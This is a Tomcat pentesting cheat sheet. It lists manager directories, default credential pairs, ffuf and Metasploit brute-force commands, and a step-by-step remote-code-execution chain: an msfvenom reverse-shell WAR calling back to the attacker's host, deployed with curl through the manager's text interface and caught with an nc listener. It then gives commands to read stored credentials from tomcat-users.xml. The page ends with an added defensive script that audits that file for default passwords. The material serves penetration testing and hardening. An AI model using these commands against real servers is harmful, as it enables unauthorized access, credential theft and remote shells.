# Apache Tomcat Pentesting

Apache Tomcat is an implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies.

### Directories <a href="#directories" id="directories"></a>

Below are common directories for Apache Tomcat.

```shellscript
/examples
/examples/jsp/cal/login.html
/examples/jsp/error/error.html
/examples/jsp/snp/snoop.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/JndiServlet
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestParamExample

/host-manager

/manager
/manager/jmxproxy/?qry=STUFF
/manager/status
/manager/status/all
# The /manager/text/ interface takes a command as the last path segment
/manager/text/{command}?{parameters}
/manager/text/deploy?path=/foo
/manager/text/list
/manager/text/resources
/manager/text/serverinfo
/manager/text/vminfo
```

#### Directory Discovery <a href="#directory-discovery" id="directory-discovery"></a>

To enumerate directories automatically, use fuzzing tools.

```shellscript
ffuf -u https://example.com/FUZZ -w directories.txt
ffuf -u https://example.com/host-manager/FUZZ -w directories.txt
ffuf -u https://example.com/manager/FUZZ -w directories.txt
```

### Credentials <a href="#credentials" id="credentials"></a>

Below are common credentials for the manager app in Tomcat.

```shellscript
admin:(empty)
admin:admin
admin:password
admin:password1
admin:Password1
admin:tomcat
manager:manager
root:changethis
root:password
root:password1
root:root
root:r00t
root:toor
tomcat:(empty)
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:s3cret
tomcat:tomcat
```

#### User Enumeration <a href="#user-enumeration" id="user-enumeration"></a>

```shellscript
# Metasploit
msf> use auxiliary/scanner/http/tomcat_enum
msf> set TARGETURI /manager  # depending on the website
```

#### Brute Force Credentials <a href="#brute-force-credentials" id="brute-force-credentials"></a>

```shellscript
ffuf -u https://tomcat:FUZZ@example.com/manager -w passwords.txt -fs 140

# Metasploit
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf> set VHOST example.local
msf> set stop_on_success true
msf> set username tomcat
msf> set RHOSTS <target-ip>
```

### Remote Code Execution (RCE) <a href="#remote-code-execution-rce" id="remote-code-execution-rce"></a>

#### Using Metasploit <a href="#using-metasploit" id="using-metasploit"></a>

```shellscript
msfconsole
msf> use exploit/multi/http/tomcat_mgr_upload
```

#### Uploading WAR file (Reverse Shell) <a href="#uploading-war-file-reverse-shell" id="uploading-war-file-reverse-shell"></a>

First, create a WAR file with msfvenom.

```shellscript
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<local-ip> LPORT=80 -f war -o shell.war
```

Then upload it through the manager's text interface.

```shellscript
curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"
```

Start a listener on the local machine.

```shellscript
sudo nc -lvnp 80
```

Now browse to `https://example.com/shell`.

We should get a shell.

### Investigation From Inside <a href="#investigation-from-inside" id="investigation-from-inside"></a>

Once on the target system, we can look for stored credentials in `tomcat-users.xml`.

```shellscript
# Locate the file first; it is usually under the Tomcat conf/ directory
find / -name "tomcat-users.xml" 2>/dev/null
# Print every copy found
find / -name "tomcat-users.xml" -exec cat {} \; 2>/dev/null
```
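As an added example (not part of the original page), the following script audits a `tomcat-users.xml` against the default credential list from the Credentials section above, flagging accounts that hold a manager or host-manager role and use a listed pair or an empty password. The sample XML and the role set are constructed for the example; the attribute names follow Tomcat's file format.

```python
"""Audit a tomcat-users.xml for default or weak manager credentials (added example)."""
import xml.etree.ElementTree as ET

# Pairs taken from the credential list above; "" stands for (empty).
DEFAULT_CREDS = {
    ("admin", ""), ("admin", "admin"), ("admin", "password"), ("admin", "tomcat"),
    ("manager", "manager"), ("root", "root"), ("root", "toor"), ("root", "changethis"),
    ("tomcat", ""), ("tomcat", "admin"), ("tomcat", "tomcat"), ("tomcat", "s3cret"),
}
# Roles that grant access to the manager / host-manager applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Constructed sample tomcat-users.xml for offline testing (not a real deployment).
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="" roles="manager-script"/>
  <user username="alice" password="Q7v!pL2#kR9m" roles="manager-gui"/>
  <user username="guest" password="guest" roles=""/>
</tomcat-users>
"""

def audit_tomcat_users(xml_text):
    """Return (username, reason, privileged_roles) for each weak manager account."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.split("}")[-1] != "user":   # strip the default namespace, if any
            continue
        # Tomcat accepts "username" and, in older files, "name".
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue  # no manager access: out of scope for this check
        if (name, password) in DEFAULT_CREDS:
            findings.append((name, "default credential pair", privileged))
        elif password == "":
            findings.append((name, "empty password", privileged))
    return findings

if __name__ == "__main__":
    for name, reason, roles in audit_tomcat_users(SAMPLE_XML):
        print(f"{name}: {reason}; roles={','.join(roles)}")
```

Only plaintext passwords are compared; entries stored as digests via a CredentialHandler will not match a listed pair and should be reviewed separately.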
